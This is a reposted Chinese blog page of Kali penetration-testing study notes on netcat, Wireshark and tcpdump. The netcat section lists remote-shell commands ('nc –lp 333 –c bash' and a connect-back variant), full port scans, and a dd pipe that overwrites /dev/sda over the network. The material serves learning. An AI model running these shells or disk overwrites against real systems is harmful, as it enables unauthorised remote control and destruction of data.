码迷,mamicode.com
首页 > 其他好文 > 详细

kali--nc,wireshark,tcpdump笔记

时间:2018-05-06 12:16:54      阅读:315      评论:0      收藏:0      [点我收藏+]

标签:界面   src   eth   克隆   测试   物理   print   asc   身份认证   

Kali渗透测试第五章笔记

第五章是基本工具的学习,主要包含了nc,wireshark,tcpdump三个工具的学习这是经常使用的强大工具。

一、     Netcat

Nc –nv 1.1.1.1 110 连接1.1.1.1的110端口

:传输文本信息

Nc –lp 4444 监听4444端口

Nc –nv 1.1.1.1 4444 连接1.1.1.1的4444监听端口

:传输文件/目录

Nc –lp 333 > 1.mp4 #监听333发送1.MP4

Nc –nv 1.1.1.1 333 < 1.mp4 –q 1 #接收1.MP4,接收完毕后1s退出 q:退出

Or

Nc –lp 333 < 1.mp4 –q 1

Nc –nv 1.1.1.1 333 > a.mp4

:传输目录

Tar –cvf –music/ | nc –lp 333 –q 1

Nc –nv 1.1.1.1 333 | tar –xvf –

:流媒体

Cat 1.mp4 | nc –lp 333

Nc –nv 1.1.1.1 333 | mplayer –vo x11 –cache 3000 –

:端口扫描

Nc –nvz 1.1.1.1 1-65535 tcp 端口

Nc –nvzu 1.1.1.1 1-1024  udp 端口

:远程克隆硬盘

Nc –lp 333 | dd of=/dev/sda

Dd if=/dev/sda | nc –nv 1.1.1.1 333 –q -1

:远程控制(windows把bash改成cmd)

Nc –lp 333 –c bash

Nc 1.1.1.1 333

Nc –lp 333

Nc  1.1.1.1 333 –c bash

:nc不能加密缺乏身份认证

解决办法

Ncat –c bash –allow 192.168.191.3 –vnl 333 –ssl

Ncat –nv 1.1.1.1 333 -ssl

 

二、     Wireshark

Wireshark 的使用

启动-选择网卡-混杂模式-实时抓包-分析-首选项

如今的wireshark有中文界面

WireShark 分层显示协议

物理层

数据链路层

网络层 ARP IP

传输层 TCP, UDP, ICMP

会话层

表示层

应用层

 

三、     Tcpdump

:抓包

tcpdump -i eth0 tcp 只抓TCP 包

Tcpdump –i eth0 –s 0 –w file.pcap #tcpdump默认抓取前68个字节,s代表size

:读取抓包

Tcpdump –r file.pcap

:筛选

     tcpdump -A 是以 ASCII 码的形式打印包的详细内容

      - -X 是以 十六进制的形式打印抓包的内容

显示筛选器:

-n 不做域名解析,直接显示IP地址

-r 读文件

awk ‘{print $3}‘ 打印第三列

sort -u 去重

tcpdump -n src host 1.1.1.1 -r file.pcap

tcpdump -n dst host 1.1.1.1 -r file.pcap

tcpdump -n tcp src port 80 -r file.pcap

 

kali--nc,wireshark,tcpdump笔记

标签:界面   src   eth   克隆   测试   物理   print   asc   身份认证   

原文地址:https://www.cnblogs.com/neoxblog/p/8997608.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!